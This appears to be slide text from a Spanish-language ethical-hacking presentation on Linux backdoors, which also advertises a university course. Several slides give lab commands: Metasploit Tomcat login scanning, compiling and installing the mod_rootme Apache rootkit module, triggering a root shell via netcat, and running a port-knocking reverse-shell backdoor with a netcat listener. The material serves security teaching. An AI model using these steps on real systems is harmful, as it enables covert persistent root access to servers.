Академический Документы
Профессиональный Документы
Культура Документы
1.
2.
3.
Quin soy?
Buscando vulnerabilidades backdoors
Qu es un backdoor?
1. Backdoor SETUID
2. Backdoor Mdulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
4. Instalando y configurando backdoors (ejemplos)
5. Informacin sobre el curso
6. Conclusiones
AGENDA
1.
2.
3.
Quin soy?
Buscando vulnerabilidades backdoors
Qu es un backdoor?
1. Backdoor SETUID
2. Backdoor Mdulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
4. Instalando y configurando backdoors (ejemplos)
5. Informacin sobre el curso
6. Conclusiones
#whoami
www.facebook.com/El.Palomo.Seguridad.Informacion
AGENDA
1.
2.
Quin soy?
Qu es un backdoor?
1. Backdoor SETUID
2. Backdoor Mdulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
3. Instalando y configurando backdoors (ejemplos)
4. Informacin sobre el curso
5. Conclusiones
Qu es un Backdoor (puerta
trasera)?
Los backdoors son programas utilizados por
los hackers para lograr acceso a sistemas
operativos de manera rpida y sencilla.
Existen diferentes tipos de backdoors:
Backdoors en Aplicaciones Web
Backdoors a travs de SETUID
Backdoors en Mdulos de Servicios
Backdoors del tipo Knocking
TARGET
- Servidor TOMCAT vulnerable
- Aqu se instalaran los backdoors
- Sistema Operativo Linux
ATACANTE 2
- Computador desde el cual se
explotaran los backdoors
- Sistema Operativo Linux
Direccin IP: 192.168.4.132
Identificar Vulnerabilidades en
Vamos a utilizar METASPLOIT para identificar vulnerabilidades:
TOMCAT
Root> msfconsole
Root> search tomcat
Root> use auxiliary/scanner/http/tomcat_mgr_login
Root> show options
Root> set RHOSTS 192.168.4.130
https://github.com/jingchunzhang/backdoor_rootkit/tree/ma
ster/mod_rootme-0.4
Backdoor en Apache
Server
Comandos en el Sistema Operativo
root>cd mod_rootme-0.4/
root>Make Linux
root> cp mod_rootme2.so /etc/httpd/modules
root> /etc/init.d/httpd reload
En el cliente:
Root> nc 192.168.4.130 80
GET root
Backdoor:
BindShell
Las primeras herramientas
utilizados por
Hackers fue la navaja suiza NETCAT.
Una BindShell es un programa corriendo
una SHELL dentro de un proceso de red.
Una BindShell puede estar escrita en
cualquier lenguaje de programacin.
http://netcat.sourceforge.net/download.php
--enable-
Backdoor: KnockOut
Knock viene del ingles tocar la puerta.
Este es un backdoor del tipo Reverse
Shell que pasa desapercibido.
Slo puede ser accedido por aquel
que conozca la combinacin de la
puerta correcta.
Backdoor: KnockOut
En el servidor:
Root> $make servidor
Root> ./knock-outd knock-out.conf eth5
En el cliente (atacante):
Root> $make cliente
Root> ./knock-outc 192.168.4.130 knock-out.conf
Root> ./netcat -lv -p 64876
AGENDA
1.
2.
Quin soy?
Qu es un backdoor?
1. Backdoor SETUID
2. Backdoor Mdulo de APACHE
3. Backdoor Bind Shell
4. Backdoor Reverse Shell
5. Backdoor KnockOut
3. Instalando y configurando backdoors (ejemplos)
4. Informacin sobre el curso
5. Conclusiones
Curso de Ethical
Hacking
https://www.facebook.com/sistemasuni/
Lugar: Universidad Nacional de
Ingeniera (UNI) Lima Per
Duracin: 24 horas Curso Bsico
24 horas Curso Avanzado
Certificado: A nombre de la Universidad
Nacional de Ingeniera (UNI)
Prximo Inicio: Inicios Recurrentes